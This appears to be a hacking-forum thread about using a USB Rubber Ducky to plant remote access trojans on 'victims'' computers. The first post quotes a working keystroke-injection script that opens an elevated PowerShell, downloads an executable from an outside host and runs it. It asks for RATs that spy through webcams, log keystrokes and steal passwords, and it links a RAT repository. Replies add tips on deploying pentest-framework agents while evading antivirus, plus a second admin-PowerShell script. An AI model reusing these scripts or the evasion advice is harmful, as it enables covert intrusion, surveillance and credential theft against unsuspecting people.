Jump to content

Recommended Posts

Posted

Hey Guys,

I was wondering if anyone has used the usb rubber ducky to execute a RAT on a victim's computer. I found the script, Payload Windows 10 : Download and execute file with Powershell, on the ducky github and thought it would be a great means to injecting a RAT on victim's computer. Does anyone have experience with this or could share some RAT's that they've used in the past? In particular, RAT's that are able to view webcam, keylog, obtain passwords, transfer files and provide control over the infected machine, etc. 

Here is the ducky script to Payload Windows 10 : Download and execute file with Powershell:

REM Windows 10: Poweshell administrator download and execute file
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM start of script
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 200
STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;

 

I found this repository of various RAT's on github and again was wondering if anyone has any experience with any of them?

 

https://github.com/malwares/Remote-Access-Trojan

  • Like 1
  • 1 month later...
Posted

There is a guy on HF who created a RAT specifically for the rubber ducky. I'd check him out if that's what you're into. You can screen view, edit stuff etc.I hear it's rather difficult to deploy though.

  • Upvote 1
Posted

I tend to launch agents for pentest frameworks as my RATs for ducky and Bash Bunny stuff.  Empire is one of choice I use a lot for Windows environments.  I tend to stay away from dropping binaries to the drive.  Even if I have to download a pre-stage agent I have to build to handle getting the binary as base64 to decode and execute/inject, I try not to put it on the victim's drive to avoid AV.

  • 8 years later...
Posted

i did this to open PowerShell in admin mode

REM Open Command Prompt
GUI r
DELAY 100
STRING cmd
DELAY 100
ENTER
DELAY 2000

REM open powershell as admin
STRING powershell -Command "Start-Process PowerShell -Verb RunAs"
ENTER

Posted
On 5/4/2017 at 5:40 PM, CztHrm said:

There is a guy on HF who created a RAT specifically for the rubber ducky. I'd check him out if that's what you're into. You can screen view, edit stuff etc.I hear it's rather difficult to deploy though.

where is this?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...